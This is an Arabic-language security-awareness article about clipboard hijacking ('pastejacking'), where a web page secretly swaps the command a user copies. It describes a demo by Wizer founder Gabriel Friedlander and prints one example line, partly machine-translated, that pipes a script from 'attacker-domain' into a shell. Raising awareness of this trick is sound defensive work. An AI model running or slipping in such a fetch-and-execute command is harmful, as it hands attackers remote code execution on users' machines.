- نحن جميعًا نقوم بالنسخ واللصق من الإنترنت يوميًا دون معرفة المخاطر فعليًا.
- استغرق أحد الخبراء الأمنيين الوقت الكافي ليُظهر للجميع السيناريو الأسوأ عند القيام بذلك.
- يعد لصق الأوامر التي حصلت عليها من الإنترنت في جهازك الطرفي طريقة سريعة للاختراق
- الأوامر التي اعتقدت أنك تلصقها في جهازك هي في الواقع أكواد ضارة.
صحيح أننا نعيش في عصر حيث السرعة هي كل شيء ، والحصول على نتائج سريعة هو كل ما يهم. ومع ذلك ، قلة من الناس يتوقفون في الواقع للحظة ويفكرون في التداعيات.
على أساس يومي ، يقوم الملايين من المبرمجين والمسؤولين والباحثين الأمنيين بأداء مهام بسيطة مثل نسخ ولصق الأوامر من صفحات الويب مباشرة إلى وحدات التحكم على أجهزة الكمبيوتر الخاصة بهم.
على الرغم من أن الكثيرين لا يفكرون في هذا الأمر مرة أخرى ، فإن الآثار المترتبة على ذلك أكبر وأكثر خطورة مما قد تعتقد في البداية ، خاصة إذا كنت تقوم بتخزين بيانات حساسة أو قيمة.
استغرق خبير أمني معروف وقتًا لمشاركته ما يمكن أن يحدث بالفعل إذا قمت بنسخ + لصق المحتوى من صفحات الويب.
يعد Copy + Paste طريقة سهلة للاختراق فعليًا
قام غابرييل فريدلاندر ، مؤسس منصة Wizer للتدريب على التوعية الأمنية ، بسحب الغطاء عن مخطط سيجعلك تفكر مرتين قبل نسخ الأوامر من صفحات الويب ولصقها.
أصبح نسخ المحتوى ولصقه من الإنترنت أمرًا شائعًا في الوقت الحاضر ، لدرجة أن لا أحد يفكر فيه مرة أخرى.
ومع ذلك ، يحذر فريدلاندر من أن بعض صفحات الويب أكثر خداعًا مما قد يدركه المرء في البداية ، وما تعتقد أنك نسخته منه يختلف تمامًا عما فعلته بالفعل.
والجزء الأسوأ من كل هذا هو أنه بدون المعرفة أو التوجيه الضروريين ، لا يدرك الضحايا خطأهم إلا بعد لصق النص ، وعند هذه النقطة قد يكون الأوان قد فات بالفعل.
ابتكر المحلل الأمني أيضًا اختبارًا صغيرًا لقراء مدونته ، فقط حتى يتمكن الناس من فهم مدى سهولة فتح الباب عن غير قصد لمجرمي الإنترنت.
لقد قدم أمرًا من المفترض نسخه ، ولكن لا يتم الكشف عن الحقيقة المقلقة إلا عند لصق النص ومعرفة ما قدمته بالفعل في الإعداد الخاص بك.
بعد نسخ الأمر الموضح في لقطة الشاشة أعلاه ، ستصدمك نتيجة لصقه ، لأنه بعيد عن ما كنت تعتقد أنك تكرره.
لفة http://attacker-domain: 8000 / شل.ش | شإلى جانب الأمر المختلف تمامًا الموجود في الحافظة الخاصة بك ، فإن حرف السطر الجديد (أو الرجوع) في يعني نهايته أن المثال أعلاه سيتم تنفيذه بمجرد لصقه مباشرة في Linux طرفية.
لذلك من الأفضل أن تكون أكثر وعياً بما يحدث بالفعل وأن تتعامل مع هذا على أنه خطر خطير على السلامة. لا نقول إن جميع مواقع الويب تخفي محتوى ضارًا ، ولكن من المفيد أخذ ذلك في الاعتبار.
هل سبق لك أن تعرضت للاختراق من لصق أوامر مراوغة في جهازك؟ شارك تجربتك معنا في قسم التعليقات أدناه.
